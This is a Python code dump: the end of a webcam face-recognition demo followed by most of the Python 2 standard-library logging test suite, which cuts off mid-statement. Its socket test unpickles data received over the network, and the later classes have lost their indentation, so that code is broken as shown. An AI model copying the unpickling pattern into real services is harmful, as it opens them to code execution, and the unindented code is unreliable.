        add_overlays(frame, face_det, frame_rate)
        frame_count += 1
        cv2.imshow('Video', frame)
        k = cv2.waitKey(1)
        if k == ord('q'):
            break
        elif k == ord('r'):
            # NOTE(review): Thread's `verbose` kwarg exists only on
            # Python 2; on Python 3 this raises TypeError — confirm the
            # target interpreter version.
            Thread(target=retrain_wrapper, verbose=True).start()
            continue
        elif k == ord('d'):
            current_person()
            continue
    # When everything is done, release the capture
    video_capture.release()
    cv2.destroyAllWindows()
def current_person():
    """Print the most recently recognized name and return the cache client.

    The name is read from the shared memcache client under the key 'Name'.
    """
    global current_detected
    name = current_detected.get('Name')
    print(name)
    return current_detected
def face_reg_wrapper(frame):
    """Identify faces in *frame* and publish the result.

    Runs on a background thread started by main(); detections are handed
    to the display loop through the module-level `face_det` global.
    """
    global face_recognition
    global face_det
    face_det = face_recognition.identify(frame)
def retrain_wrapper():
    """Incrementally retrain the recognizer's encoder model in-place."""
    global face_recognition
    encoder = face_recognition.encoder
    encoder.retrain_model(incremental=True)
def parse_arguments(argv):
    """Parse command-line options for the realtime demo.

    Arguments:
      argv: list of argument strings (excluding the program name).
    Returns:
      argparse.Namespace with a boolean `debug` attribute.
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument(
        '--debug', action='store_true',
        help='Enable some debug outputs.')
    return arg_parser.parse_args(argv)
# Script entry point: parse CLI flags and start the webcam loop.
if __name__ == '__main__':
    main(parse_arguments(sys.argv[1:]))
|
test_logging.py | # Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import random
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):

    """Base class for logging tests.

    Redirects the root logger to an in-memory stream and snapshots the
    logging module's internal state so each test runs isolated and the
    state can be restored afterwards. NOTE: uses Python 2-era internals
    (logging._levelNames, _acquireLock/_releaseLock).
    """

    # Format applied to the captured stream.
    log_format = "%(name)s -> %(levelname)s: %(message)s"
    # Regex each captured line must match; groups are compared by
    # assert_log_lines().
    expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
    # Counter backing next_message(); per-instance once incremented.
    message_num = 0

    def setUp(self):
        """Setup the default logging stream to an internal StringIO instance,
        so that we can examine log output as we want."""
        logger_dict = logging.getLogger().manager.loggerDict
        # Snapshot module-level state under the logging lock so a parallel
        # logger creation cannot corrupt the copies.
        logging._acquireLock()
        try:
            self.saved_handlers = logging._handlers.copy()
            self.saved_handler_list = logging._handlerList[:]
            self.saved_loggers = logger_dict.copy()
            self.saved_level_names = logging._levelNames.copy()
        finally:
            logging._releaseLock()
        # Set two unused loggers: one non-ASCII and one Unicode.
        # This is to test correct operation when sorting existing
        # loggers in the configuration code. See issue 8201.
        logging.getLogger("\xab\xd7\xbb")
        logging.getLogger(u"\u013f\u00d6\u0047")
        self.root_logger = logging.getLogger("")
        self.original_logging_level = self.root_logger.getEffectiveLevel()
        # Capture everything the root logger emits into this stream.
        self.stream = cStringIO.StringIO()
        self.root_logger.setLevel(logging.DEBUG)
        self.root_hdlr = logging.StreamHandler(self.stream)
        self.root_formatter = logging.Formatter(self.log_format)
        self.root_hdlr.setFormatter(self.root_formatter)
        self.root_logger.addHandler(self.root_hdlr)

    def tearDown(self):
        """Remove our logging stream, and restore the original logging
        level."""
        self.stream.close()
        self.root_logger.removeHandler(self.root_hdlr)
        # Drop any handlers a test may have added.
        while self.root_logger.handlers:
            h = self.root_logger.handlers[0]
            self.root_logger.removeHandler(h)
            h.close()
        self.root_logger.setLevel(self.original_logging_level)
        # Restore the module-level snapshots taken in setUp().
        logging._acquireLock()
        try:
            logging._levelNames.clear()
            logging._levelNames.update(self.saved_level_names)
            logging._handlers.clear()
            logging._handlers.update(self.saved_handlers)
            logging._handlerList[:] = self.saved_handler_list
            loggerDict = logging.getLogger().manager.loggerDict
            loggerDict.clear()
            loggerDict.update(self.saved_loggers)
        finally:
            logging._releaseLock()

    def assert_log_lines(self, expected_values, stream=None):
        """Match the collected log lines against the regular expression
        self.expected_log_pat, and compare the extracted group values to
        the expected_values list of tuples."""
        stream = stream or self.stream
        pat = re.compile(self.expected_log_pat)
        try:
            stream.reset()
            actual_lines = stream.readlines()
        except AttributeError:
            # StringIO.StringIO lacks a reset() method.
            actual_lines = stream.getvalue().splitlines()
        self.assertEqual(len(actual_lines), len(expected_values))
        for actual, expected in zip(actual_lines, expected_values):
            match = pat.search(actual)
            if not match:
                self.fail("Log line does not match expected pattern:\n" +
                          actual)
            self.assertEqual(tuple(match.groups()), expected)
        # Anything left unread means unexpected extra output.
        s = stream.read()
        if s:
            self.fail("Remaining output at end of log stream:\n" + s)

    def next_message(self):
        """Generate a message consisting solely of an auto-incrementing
        integer."""
        self.message_num += 1
        return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):

    """Test builtin levels and their inheritance."""

    def test_flat(self):
        # Logging levels in a flat logger namespace.
        m = self.next_message

        ERR = logging.getLogger("ERR")
        ERR.setLevel(logging.ERROR)
        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        DEB = logging.getLogger("DEB")
        DEB.setLevel(logging.DEBUG)

        # These should log.
        ERR.log(logging.CRITICAL, m())
        ERR.error(m())

        INF.log(logging.CRITICAL, m())
        INF.error(m())
        INF.warn(m())
        INF.info(m())

        DEB.log(logging.CRITICAL, m())
        DEB.error(m())
        DEB.warn(m())
        DEB.info(m())
        DEB.debug(m())

        # These should not log.
        ERR.warn(m())
        ERR.info(m())
        ERR.debug(m())

        INF.debug(m())

        # Message numbers are global, so the suppressed calls above still
        # consumed numbers; only the emitted ones appear here.
        self.assert_log_lines([
            ('ERR', 'CRITICAL', '1'),
            ('ERR', 'ERROR', '2'),
            ('INF', 'CRITICAL', '3'),
            ('INF', 'ERROR', '4'),
            ('INF', 'WARNING', '5'),
            ('INF', 'INFO', '6'),
            ('DEB', 'CRITICAL', '7'),
            ('DEB', 'ERROR', '8'),
            ('DEB', 'WARNING', '9'),
            ('DEB', 'INFO', '10'),
            ('DEB', 'DEBUG', '11'),
        ])

    def test_nested_explicit(self):
        # Logging levels in a nested namespace, all explicitly set.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)

        # These should log.
        INF_ERR.log(logging.CRITICAL, m())
        INF_ERR.error(m())

        # These should not log.
        INF_ERR.warn(m())
        INF_ERR.info(m())
        INF_ERR.debug(m())

        self.assert_log_lines([
            ('INF.ERR', 'CRITICAL', '1'),
            ('INF.ERR', 'ERROR', '2'),
        ])

    def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        # These three have no explicit level and inherit from their parents.
        INF_UNDEF = logging.getLogger("INF.UNDEF")
        INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
        UNDEF = logging.getLogger("UNDEF")

        # These should log.
        INF_UNDEF.log(logging.CRITICAL, m())
        INF_UNDEF.error(m())
        INF_UNDEF.warn(m())
        INF_UNDEF.info(m())
        INF_ERR_UNDEF.log(logging.CRITICAL, m())
        INF_ERR_UNDEF.error(m())

        # These should not log.
        INF_UNDEF.debug(m())
        INF_ERR_UNDEF.warn(m())
        INF_ERR_UNDEF.info(m())
        INF_ERR_UNDEF.debug(m())

        self.assert_log_lines([
            ('INF.UNDEF', 'CRITICAL', '1'),
            ('INF.UNDEF', 'ERROR', '2'),
            ('INF.UNDEF', 'WARNING', '3'),
            ('INF.UNDEF', 'INFO', '4'),
            ('INF.ERR.UNDEF', 'CRITICAL', '5'),
            ('INF.ERR.UNDEF', 'ERROR', '6'),
        ])

    def test_nested_with_virtual_parent(self):
        # Logging levels when some parent does not exist yet.
        m = self.next_message

        INF = logging.getLogger("INF")
        # Creating the grandchild before the child exercises the placeholder
        # mechanism in the logger manager.
        GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
        CHILD = logging.getLogger("INF.BADPARENT")
        INF.setLevel(logging.INFO)

        # These should log.
        GRANDCHILD.log(logging.FATAL, m())
        GRANDCHILD.info(m())
        CHILD.log(logging.FATAL, m())
        CHILD.info(m())

        # These should not log.
        GRANDCHILD.debug(m())
        CHILD.debug(m())

        self.assert_log_lines([
            ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
            ('INF.BADPARENT.UNDEF', 'INFO', '2'),
            ('INF.BADPARENT', 'CRITICAL', '3'),
            ('INF.BADPARENT', 'INFO', '4'),
        ])

    def test_invalid_name(self):
        # A non-string logger name (here the builtin `any`) must be rejected.
        self.assertRaises(TypeError, logging.getLogger, any)
class BasicFilterTest(BaseTest):

    """Test the bundled Filter class."""

    def test_filter(self):
        # Only messages satisfying the specified criteria pass through the
        # filter: a Filter("spam.eggs") passes "spam.eggs" and its children
        # but blocks siblings and ancestors.
        filter_ = logging.Filter("spam.eggs")
        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(filter_)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")

            spam.info(self.next_message())
            spam_eggs.info(self.next_message())  # Good.
            spam_eggs_fish.info(self.next_message())  # Good.
            spam_bakedbeans.info(self.next_message())

            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
# Custom application levels: note the inverted convention described above —
# larger values mean LESS information being logged.
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
# All custom levels, lowest (most chatty) to highest (most silent).
LEVEL_RANGE = range(BORING, SILENT + 1)

#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
    SILENT : 'Silent',
    TACITURN : 'Taciturn',
    TERSE : 'Terse',
    EFFUSIVE : 'Effusive',
    SOCIABLE : 'Sociable',
    VERBOSE : 'Verbose',
    TALKATIVE : 'Talkative',
    GARRULOUS : 'Garrulous',
    CHATTERBOX : 'Chatterbox',
    BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
    """Filter that drops every record logged at the GARRULOUS level."""

    def filter(self, record):
        # Reject exactly the GARRULOUS level; let everything else pass.
        if record.levelno == GARRULOUS:
            return False
        return True
class VerySpecificFilter(logging.Filter):
    """Filter that drops SOCIABLE and TACITURN records."""

    def filter(self, record):
        # Block the two specific chat levels; everything else passes.
        blocked_levels = (SOCIABLE, TACITURN)
        return record.levelno not in blocked_levels
class CustomLevelsAndFiltersTest(BaseTest):

    """Test various filtering possibilities with custom logging levels."""

    # Skip the logger name group.
    expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Register the custom level names; BaseTest.tearDown restores the
        # original level-name table from its snapshot.
        for k, v in my_logging_levels.items():
            logging.addLevelName(k, v)

    def log_at_all_levels(self, logger):
        # Emit one numbered message at every custom level, lowest first.
        for lvl in LEVEL_RANGE:
            logger.log(lvl, self.next_message())

    def test_logger_filter(self):
        # Filter at logger level.
        self.root_logger.setLevel(VERBOSE)
        # Levels >= 'Verbose' are good.
        self.log_at_all_levels(self.root_logger)
        self.assert_log_lines([
            ('Verbose', '5'),
            ('Sociable', '6'),
            ('Effusive', '7'),
            ('Terse', '8'),
            ('Taciturn', '9'),
            ('Silent', '10'),
        ])

    def test_handler_filter(self):
        # Filter at handler level.
        self.root_logger.handlers[0].setLevel(SOCIABLE)
        try:
            # Levels >= 'Sociable' are good.
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines([
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ])
        finally:
            self.root_logger.handlers[0].setLevel(logging.NOTSET)

    def test_specific_filters(self):
        # Set a specific filter object on the handler, and then add another
        # filter object on the logger itself.
        handler = self.root_logger.handlers[0]
        specific_filter = None
        garr = GarrulousFilter()
        handler.addFilter(garr)
        try:
            self.log_at_all_levels(self.root_logger)
            first_lines = [
                # Notice how 'Garrulous' is missing
                ('Boring', '1'),
                ('Chatterbox', '2'),
                ('Talkative', '4'),
                ('Verbose', '5'),
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ]
            self.assert_log_lines(first_lines)

            specific_filter = VerySpecificFilter()
            self.root_logger.addFilter(specific_filter)
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines(first_lines + [
                # Not only 'Garrulous' is still missing, but also 'Sociable'
                # and 'Taciturn'
                ('Boring', '11'),
                ('Chatterbox', '12'),
                ('Talkative', '14'),
                ('Verbose', '15'),
                ('Effusive', '17'),
                ('Terse', '18'),
                ('Silent', '20'),
            ])
        finally:
            if specific_filter:
                self.root_logger.removeFilter(specific_filter)
            handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):

    """Tests for the MemoryHandler."""

    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Buffer up to 10 records; flush to root_hdlr on WARNING or above.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr)
        self.mem_logger = logging.getLogger('mem')
        self.mem_logger.propagate = 0
        self.mem_logger.addHandler(self.mem_hdlr)

    def tearDown(self):
        self.mem_hdlr.close()
        BaseTest.tearDown(self)

    def test_flush(self):
        # The memory handler flushes to its target handler based on specific
        # criteria (message count and message level).
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        # This will flush because the level is >= logging.WARNING
        self.mem_logger.warn(self.next_message())
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
            ('WARNING', '3'),
        ]
        self.assert_log_lines(lines)
        for n in (4, 14):
            # Nine DEBUG records stay buffered...
            for i in range(9):
                self.mem_logger.debug(self.next_message())
            self.assert_log_lines(lines)
            # This will flush because it's the 10th message since the last
            # flush.
            self.mem_logger.debug(self.next_message())
            lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
            self.assert_log_lines(lines)

            self.mem_logger.debug(self.next_message())
            self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
    """Formatter whose exception text is just the exception class name."""

    def formatException(self, ei):
        # ei is a sys.exc_info() triple; element 0 is the exception class.
        exc_class = ei[0]
        return "Got a [%s]" % exc_class.__name__
class ConfigFileTest(BaseTest):

    """Reading logging config from a .ini-style config file."""

    expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"

    # config0 is a standard configuration.
    config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config1 adds a little to the standard configuration.
    config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config1a moves the handler to the root.
    config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config2 has a subtle configuration error that should be reported
    config2 = config1.replace("sys.stdout", "sys.stbout")

    # config3 has a less subtle configuration error
    config3 = config1.replace("formatter=form1", "formatter=misspelled_name")

    # config4 specifies a custom formatter class to be loaded
    config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""

    # config5 specifies a custom handler class to be loaded
    config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')

    # config6 uses ', ' delimiters in the handlers and formatters sections
    config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""

    # config7 adds a compiler logger.
    config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # Minimal config used to exercise disable_existing_loggers behaviour.
    disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""

    def apply_config(self, conf, **kwargs):
        # Feed the (dedented) config text to fileConfig as a file object.
        file = cStringIO.StringIO(textwrap.dedent(conf))
        logging.config.fileConfig(file, **kwargs)

    def test_config0_ok(self):
        # A simple config file which overrides the default settings.
        with captured_stdout() as output:
            self.apply_config(self.config0)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config1_ok(self, config=config1):
        # A config file defining a sub-parser as well.
        with captured_stdout() as output:
            self.apply_config(config)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config2_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(StandardError, self.apply_config, self.config2)

    def test_config3_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(StandardError, self.apply_config, self.config3)

    def test_config4_ok(self):
        # A config file specifying a custom formatter class.
        with captured_stdout() as output:
            self.apply_config(self.config4)
            logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])

    def test_config5_ok(self):
        self.test_config1_ok(config=self.config5)

    def test_config6_ok(self):
        self.test_config1_ok(config=self.config6)

    def test_config7_ok(self):
        with captured_stdout() as output:
            self.apply_config(self.config1a)
            logger = logging.getLogger("compiler.parser")
            # See issue #11424. compiler-hyphenated sorts
            # between compiler and compiler.xyz and this
            # was preventing compiler.xyz from being included
            # in the child loggers of compiler because of an
            # overzealous loop termination condition.
            hyphenated = logging.getLogger('compiler-hyphenated')
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
                ('CRITICAL', '3'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with captured_stdout() as output:
            self.apply_config(self.config7)
            logger = logging.getLogger("compiler.parser")
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            # Will not appear
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '4'),
                ('ERROR', '5'),
                ('INFO', '6'),
                ('ERROR', '7'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_logger_disabling(self):
        # Reapplying a config disables existing loggers by default; passing
        # disable_existing_loggers=False re-enables them.
        self.apply_config(self.disable_test)
        logger = logging.getLogger('foo')
        self.assertFalse(logger.disabled)
        self.apply_config(self.disable_test)
        self.assertTrue(logger.disabled)
        self.apply_config(self.disable_test, disable_existing_loggers=False)
        self.assertFalse(logger.disabled)
class LogRecordStreamHandler(StreamRequestHandler):

    """Handler for a streaming logging request. It saves the log message in the
    TCP server's 'log_output' attribute."""

    # Sentinel message that tells the server to stop serving.
    TCP_LOG_END = "!!!END!!!"

    def handle(self):
        """Handle multiple requests - each expected to be of 4-byte length,
        followed by the LogRecord in pickle format. Logs the record
        according to whatever policy is configured locally."""
        while True:
            chunk = self.connection.recv(4)
            if len(chunk) < 4:
                break
            # Big-endian unsigned long prefix gives the pickled payload size.
            slen = struct.unpack(">L", chunk)[0]
            chunk = self.connection.recv(slen)
            # recv may return fewer bytes than asked; loop until complete.
            while len(chunk) < slen:
                chunk = chunk + self.connection.recv(slen - len(chunk))
            obj = self.unpickle(chunk)
            record = logging.makeLogRecord(obj)
            self.handle_log_record(record)

    def unpickle(self, data):
        # NOTE: unpickling network data is only acceptable here because both
        # endpoints live inside this test process.
        return cPickle.loads(data)

    def handle_log_record(self, record):
        # If the end-of-messages sentinel is seen, tell the server to
        # terminate.
        if self.TCP_LOG_END in record.msg:
            self.server.abort = 1
            return
        self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):

    """A simple-minded TCP socket-based logging receiver suitable for test
    purposes."""

    # Allow fast rebinding of the port between test runs.
    allow_reuse_address = 1
    # Accumulated record messages (class-level default; handlers append).
    log_output = ""

    def __init__(self, host='localhost',
                 port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
                 handler=LogRecordStreamHandler):
        ThreadingTCPServer.__init__(self, (host, port), handler)
        # Set to true (by a handler) to stop serve_until_stopped().
        self.abort = False
        # select() poll interval in seconds.
        self.timeout = 0.1
        self.finished = threading.Event()

    def serve_until_stopped(self):
        """Poll for incoming connections until self.abort becomes true."""
        while not self.abort:
            rd, wr, ex = select.select([self.socket.fileno()], [], [],
                                       self.timeout)
            if rd:
                self.handle_request()
        # Notify the main thread that we're about to exit
        self.finished.set()
        # close the listen socket
        self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):

    """Test for SocketHandler objects."""

    def setUp(self):
        """Set up a TCP server to receive log messages, and a SocketHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Port 0 lets the OS choose a free port; read it back off the socket.
        self.tcpserver = LogRecordSocketReceiver(port=0)
        self.port = self.tcpserver.socket.getsockname()[1]
        self.threads = [
            threading.Thread(target=self.tcpserver.serve_until_stopped)]
        for thread in self.threads:
            thread.start()

        self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
        self.sock_hdlr.setFormatter(self.root_formatter)
        # Replace the StreamHandler installed by BaseTest with the socket one.
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)

    def tearDown(self):
        """Shutdown the TCP server."""
        try:
            self.tcpserver.abort = True
            del self.tcpserver
            self.root_logger.removeHandler(self.sock_hdlr)
            self.sock_hdlr.close()
            for thread in self.threads:
                thread.join(2.0)
        finally:
            BaseTest.tearDown(self)

    def get_output(self):
        """Get the log output as received by the TCP server."""
        # Signal the TCP receiver and wait for it to terminate.
        self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
        self.tcpserver.finished.wait(2.0)
        return self.tcpserver.log_output

    def test_output(self):
        # The log message sent to the SocketHandler is properly received.
        logger = logging.getLogger("tcp")
        logger.error("spam")
        logger.debug("eggs")
        self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
def test_encoding_utf16_unicode(self):
# Issue #19267
log = logging.getLogger("test")
message = u'b\u0142\u0105d'
writer_class = codecs.getwriter('utf-16-le')
writer_class.encoding = 'utf-16-le'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
s = stream.getvalue()
self.assertEqual(s, 'b\x00B\x01\x05\x01d\x00\n\x00')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
